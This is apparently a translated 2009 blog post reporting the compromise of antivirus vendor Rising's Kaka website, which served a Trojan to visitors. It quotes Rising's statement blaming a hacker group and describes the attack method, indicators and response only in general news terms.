  Monitoring data showed that some pages of Rising's official site had carried the hackers' Trojan since the early hours of July 25 (link: hxxp://tool.ikaka.com/Noticeinfo/yahoo.shtml), for more than 60 hours. The attack targeted several vulnerabilities, including an Office 0-day for which Microsoft has not yet released a patch and a Firefox 3.5 vulnerability. Some users who browsed Rising's pages had a variant of the "Robot Dog" Trojan downloaded and run automatically; it can disable antivirus software and survive system restore, putting users' online-game and online-banking accounts and personal data at serious risk of theft.

Screenshot: Rising Kaka pages blocked by 360

  According to security experts, the hackers got in mainly through a web vulnerability on Rising's site. Judging by the way the Trojan was placed, the hackers very likely obtained high-level access to the site and could add malicious code to its pages at will. In testing, several security products, including 360 Safeguard, Kingsoft WebShield, Kaspersky and Changyou Xunjing, blocked the Trojan-carrying pages on Rising's site.

  The address mentioned above is now accessible normally.

  Rising's announcement on the 27th:

  Rising statement: hacker gang warned to stop its attacks; the Kaka site is accessible normally
  Source: Rising  Time: 2009-07-27 17:07:31

    At noon on July 27, Rising's "Cloud Security" system intercepted a hacker gang planting a Trojan on the "Rising Kaka" website. Rising immediately repaired and cleaned the web server, and the Kaka site is now accessible normally. The affected page was on the Rising Kaka site (www.ikaka.com), whose visitors are mostly Rising users; since Rising software fully blocks this attack and prevents the Trojan download, users need not panic.

    Rising engineers consider this an obvious act of revenge by a hacker gang: because Rising's "Cloud Security" system comprehensively monitors and blocks Trojan-seeding sites, the gang, its revenue cut off, has been attacking Rising's websites continuously. Since early July a hacker gang has used a server at 118.123.11.29 (a proxy address) to scan Rising's websites non-stop in search of an entry point.

Screenshot: Rising Kaka blocking its own website; the poor little lion blocking its own site has a touch of black humour

       Rising has reported the relevant material to the public security authorities and warns the gang to pull back from the brink and stop attacking Rising and other websites.

       Rising's Internet Attack and Defence Lab has named the group "Gang X". Since June, Rising engineers have had several rounds of engagement with "Gang X", publishing through the Kaka community analysis logs of three websites the gang broke into and helping dozens of site administrators close vulnerabilities and guard against such attacks. Rising engineers also use the "Cloud Security" system to track the gang's attack activity closely, adding the proxy server IPs and Trojan URLs it uses to a blacklist as they appear, so that even if the gang compromises some websites and plants malware, the antivirus software blocks it when users visit those sites, ensuring users are not infected.

       According to Rising "Cloud Security" data, since the start of July "Gang X" has attacked more than 200 websites, mainly government, university and entertainment sites; victims include a provincial government portal, a procuratorate site and a public security site. The gang typically first uses puppet servers to sniff, scan and probe the target site, then uses SQL injection to gain server access, and finally embeds the Trojan-site address in the pages, so that visitors to the victim site are infected.

      On July 21 alone the gang attacked from servers at the two IP addresses 59.54.54.92 and 118.123.11.29; the former is even located in a China Telecom IDC in Jiujiang, Jiangxi, where servers typically have strong computing power and the IDC's bandwidth is large, making for powerful attacks. Through extensive scanning and sniffing the gang finally found a weak spot on a low-traffic channel of the Kaka site and carried out an injection attack. Fortunately it was detected promptly, and since Rising's antivirus already blocked the embedded malicious URL, the attack did not affect many ordinary users.

      Rising has now gathered a large amount of evidence, including the gang's server addresses and IPs, the list of sites it attacked and the number of victims, and has handed this data to the public security authorities. What awaits the gang is certain defeat.

   Afterword:

Screenshot: in actual testing, the page Kaka blocks returned a 403 error
HTTP 错误 403.6 – 禁止访问:客户端的 IP 地址被拒绝。

      When I manually typed in the address from Rising's announcement, I got a 403 Forbidden; Rising has probably blocked a lot of IPs.

Permalink: https://www.cfresh.net/web-security/128